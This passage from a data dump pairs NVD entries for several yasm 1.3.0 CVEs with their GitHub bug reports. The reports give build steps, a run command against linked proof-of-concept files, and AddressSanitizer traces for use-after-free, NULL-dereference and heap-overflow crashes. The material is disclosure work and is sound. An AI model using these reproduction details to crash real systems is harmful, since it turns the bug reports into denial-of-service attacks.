fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c047fff8e10: fa fa fd[fd]fa fa 00 00 fa fa 00 00 fa fa fd fa 0x0c047fff8e20: fa fa fd fa fa fa 07 fa fa fa fd fa fa fa fd fa 0x0c047fff8e30: fa fa 07 fa fa fa 00 00 fa fa 00 00 fa fa 07 fa 0x0c047fff8e40: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa 0x0c047fff8e50: fa fa fd fa fa fa 03 fa fa fa 00 00 fa fa 00 00 0x0c047fff8e60: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==16102==ABORTING ```
AddressSanitizer: heap-use-after-free in yasm_intnum_destroy() libyasm/intnum.c:415
https://api.github.com/repos/yasm/yasm/issues/161/comments
3
2021-05-19T08:15:14Z
2024-03-21T11:56:29Z
https://github.com/yasm/yasm/issues/161
895,135,903
161
CVE-2021-33462
2022-07-26T13:15:09.647
An issue was discovered in yasm version 1.3.0. There is a use-after-free in expr_traverse_nodes_post() in libyasm/expr.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/165" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/165
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) I think it is probably a similar issue as [#126](https://github.com/yasm/yasm/issues/126 ) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-1226-expr_traverse_nodes_post-UAF ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ================================================================= ==11980==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000e5b0 at pc 0x7f418ef4a94b bp 0x7ffedeadea70 sp 0x7ffedeadea60 READ of size 4 at 0x60600000e5b0 thread T0 #0 0x7f418ef4a94a in expr_traverse_nodes_post test/yasm-uaf/SRC_asan/libyasm/expr.c:1112 #1 0x7f418ef4a94a in yasm_expr_destroy test/yasm-uaf/SRC_asan/libyasm/expr.c:1045 #2 0x7f418b7ebda1 in bin_section_data_destroy test/yasm-uaf/SRC_asan/modules/objfmts/bin/bin-objfmt.c:1684 #3 0x7f418ef2e548 in yasm__assoc_data_destroy test/yasm-uaf/SRC_asan/libyasm/assocdat.c:128 #4 0x7f418ef6dd24 in yasm_section_destroy test/yasm-uaf/SRC_asan/libyasm/section.c:676 #5 0x7f418ef6dd24 in yasm_object_destroy test/yasm-uaf/SRC_asan/libyasm/section.c:470 #6 0x404ad4 in cleanup test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:799 #7 0x4053e3 in check_errors test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:778 #8 0x402c9a in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:524 #9 0x402c9a in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #10 0x7f418e96f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #11 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) 0x60600000e5b0 is located 16 bytes inside of 56-byte region [0x60600000e5a0,0x60600000e5d8) freed by thread T0 here: #0 0x7f418f2292ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7f418ef76caa in yasm_dir_helper_expr test/yasm-uaf/SRC_asan/libyasm/valparam.c:312 #2 0x7f418ef769ff in yasm_dir_helper test/yasm-uaf/SRC_asan/libyasm/valparam.c:241 #3 0x7f418b7eb34b in bin_objfmt_section_switch test/yasm-uaf/SRC_asan/modules/objfmts/bin/bin-objfmt.c:1521 #4 0x7f418ef6cd75 in dir_section test/yasm-uaf/SRC_asan/libyasm/section.c:154 #5 0x7f418ef6d838 in yasm_object_directive test/yasm-uaf/SRC_asan/libyasm/section.c:377 #6 0x7f418b78f804 in nasm_parser_directive test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:1569 #7 0x7f418b79bd3c in parse_line test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:377 #8 0x7f418b79bd3c in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:231 #9 0x7f418b78f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #10 0x7f418b78f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #11 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #12 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #13 0x7f418e96f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) previously allocated by thread T0 here: #0 0x7f418f229602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7f418ef7a769 in def_xmalloc test/yasm-uaf/SRC_asan/libyasm/xmalloc.c:69 #2 0x7f418ef46fd2 in yasm_expr__copy_except test/yasm-uaf/SRC_asan/libyasm/expr.c:998 #3 0x7f418ef76cd0 in yasm_dir_helper_expr test/yasm-uaf/SRC_asan/libyasm/valparam.c:313 #4 0x7f418ef769ff in yasm_dir_helper test/yasm-uaf/SRC_asan/libyasm/valparam.c:241 #5 0x7f418b7eb34b in bin_objfmt_section_switch test/yasm-uaf/SRC_asan/modules/objfmts/bin/bin-objfmt.c:1521 #6 0x7f418ef6cd75 in dir_section test/yasm-uaf/SRC_asan/libyasm/section.c:154 #7 0x7f418ef6d838 in yasm_object_directive test/yasm-uaf/SRC_asan/libyasm/section.c:377 #8 0x7f418b78f804 in nasm_parser_directive test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:1569 #9 0x7f418b79bd3c in parse_line test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:377 #10 0x7f418b79bd3c in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:231 #11 0x7f418b78f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #12 0x7f418b78f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #13 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #14 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #15 0x7f418e96f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-use-after-free test/yasm-uaf/SRC_asan/libyasm/expr.c:1112 expr_traverse_nodes_post Shadow bytes around the buggy address: 0x0c0c7fff9c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9ca0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fa =>0x0c0c7fff9cb0: fa fa fa fa fd fd[fd]fd fd fd fd fa fa fa fa fa 0x0c0c7fff9cc0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd 0x0c0c7fff9cd0: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fa 0x0c0c7fff9ce0: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fff9cf0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd 0x0c0c7fff9d00: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==11980==ABORTING ```
AddressSanitizer: heap-use-after-free in expr_traverse_nodes_post() libyasm/expr.c:1112
https://api.github.com/repos/yasm/yasm/issues/165/comments
1
2021-05-19T08:21:12Z
2024-03-21T12:28:49Z
https://github.com/yasm/yasm/issues/165
895,142,015
165
CVE-2021-33463
2022-07-26T13:15:09.687
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in yasm_expr__copy_except() in libyasm/expr.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/174" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/174
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-1113-yasm_expr__copy_except-null-pointer-deref ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ASAN:SIGSEGV ================================================================= ==10834==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x7fdb4c7eafb3 bp 0x7fff7a57d890 sp 0x7fff7a57d840 T0) #0 0x7fdb4c7eafb2 in yasm_expr__copy_except test/yasm-uaf/SRC_asan/libyasm/expr.c:999 #1 0x7fdb4908fad6 in nasm_parser_directive test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:1584 #2 0x7fdb4909bd3c in parse_line test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:377 #3 0x7fdb4909bd3c in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:231 #4 0x7fdb4908f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #5 0x7fdb4908f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #6 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #7 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #8 0x7fdb4c21382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/libyasm/expr.c:999 yasm_expr__copy_except ==10834==ABORTING ```
A NULL pointer dereference in the function yasm_expr__copy_except() libyasm/expr.c:999
https://api.github.com/repos/yasm/yasm/issues/174/comments
2
2021-05-19T08:30:07Z
2024-03-22T14:00:39Z
https://github.com/yasm/yasm/issues/174
895,150,639
174
CVE-2021-33464
2022-07-26T13:15:09.730
An issue was discovered in yasm version 1.3.0. There is a heap-buffer-overflow in inc_fopen() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/164" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/164
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-7306d-inc_fopen-heap-buffer-overflow ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ================================================================= ==19224==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000009cea at pc 0x7f3f6962c06e bp 0x7ffce951a4d0 sp 0x7ffce9519c78 WRITE of size 23 at 0x603000009cea thread T0 #0 0x7f3f6962c06d in strcat (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x7306d) #1 0x7f3f65bb8458 in strcat /usr/include/x86_64-linux-gnu/bits/string3.h:148 #2 0x7f3f65bb8458 in inc_fopen test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:1835 #3 0x7f3f65bb8458 in do_directive test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:2737 #4 0x7f3f65bc0333 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5083 #5 0x7f3f65ba9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #6 0x7f3f65b9b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #7 0x7f3f65b8f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #8 0x7f3f65b8f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #9 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #10 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #11 0x7f3f68d9782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #12 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) 0x603000009cea is located 0 bytes to the right of 26-byte region [0x603000009cd0,0x603000009cea) allocated by thread T0 here: #0 0x7f3f69651602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7f3f693a2769 in def_xmalloc test/yasm-uaf/SRC_asan/libyasm/xmalloc.c:69 #2 0x7f3f65bb840c in inc_fopen test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:1823 #3 0x7f3f65bb840c in do_directive test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:2737 #4 0x7f3f65bc0333 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5083 #5 0x7f3f65ba9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #6 0x7f3f65b9b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #7 0x7f3f65b8f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #8 0x7f3f65b8f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #9 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #10 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #11 0x7f3f68d9782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strcat Shadow bytes around the buggy address: 0x0c067fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9370: fa fa fa fa fa fa fd fd fd fa fa fa fd fd fd fa 0x0c067fff9380: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd =>0x0c067fff9390: fd fa fa fa fd fd fd fa fa fa 00 00 00[02]fa fa 0x0c067fff93a0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 0x0c067fff93b0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x0c067fff93c0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x0c067fff93d0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 0x0c067fff93e0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==19224==ABORTING ```
AddressSanitizer: heap-buffer-overflow in inc_fopen() modules/preprocs/nasm/nasm-pp.c:1835
https://api.github.com/repos/yasm/yasm/issues/164/comments
4
2021-05-19T08:20:09Z
2022-12-14T17:47:19Z
https://github.com/yasm/yasm/issues/164
895,140,978
164
CVE-2021-33465
2022-07-26T13:15:09.773
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in expand_mmacro() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/173" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/173
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-4760-expand_mmacro-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==17359==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000001 (pc 0x7f2e6f6c3fc6 bp 0x7ffd238e70b0 sp 0x7ffd238e6f00 T0) #0 0x7f2e6f6c3fc5 in expand_mmacro test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:4764 #1 0x7f2e6f6c3fc5 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5128 #2 0x7f2e6f6a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #3 0x7f2e6f69b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #4 0x7f2e6f68f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #5 0x7f2e6f68f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #6 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #7 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #8 0x7f2e7286b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:4764 expand_mmacro ==17359==ABORTING ```
A NULL pointer dereference in the function expand_mmacro() modules/preprocs/nasm/nasm-pp.c:4764
https://api.github.com/repos/yasm/yasm/issues/173/comments
1
2021-05-19T08:29:17Z
2024-03-21T12:35:36Z
https://github.com/yasm/yasm/issues/173
895,149,848
173
CVE-2021-33466
2022-07-26T13:15:09.817
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in expand_smacro() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/172" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/172
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) I think it is probably a similar issue as [#142](https://github.com/yasm/yasm/issues/142) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-4352-expand_smacro-null-pointer-deref ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ASAN:SIGSEGV ================================================================= ==16729==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000001c (pc 0x7fa8f23b196d bp 0x7fff0c7cf990 sp 0x7fff0c7cf820 T0) #0 0x7fa8f23b196c in expand_smacro test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:4229 #1 0x7fa8f23c0ac7 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5127 #2 0x7fa8f23a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #3 0x7fa8f239b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #4 0x7fa8f238f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #5 0x7fa8f238f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #6 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #7 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #8 0x7fa8f559882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:4229 expand_smacro ==16729==ABORTING ```
A NULL pointer dereference in the function expand_smacro() modules/preprocs/nasm/nasm-pp.c:4229
https://api.github.com/repos/yasm/yasm/issues/172/comments
1
2021-05-19T08:28:18Z
2024-03-21T12:36:44Z
https://github.com/yasm/yasm/issues/172
895,148,925
172
CVE-2021-33467
2022-07-26T13:15:09.860
An issue was discovered in yasm version 1.3.0. There is a use-after-free in pp_getline() in modules/preprocs/nasm/nasm-pp.c.
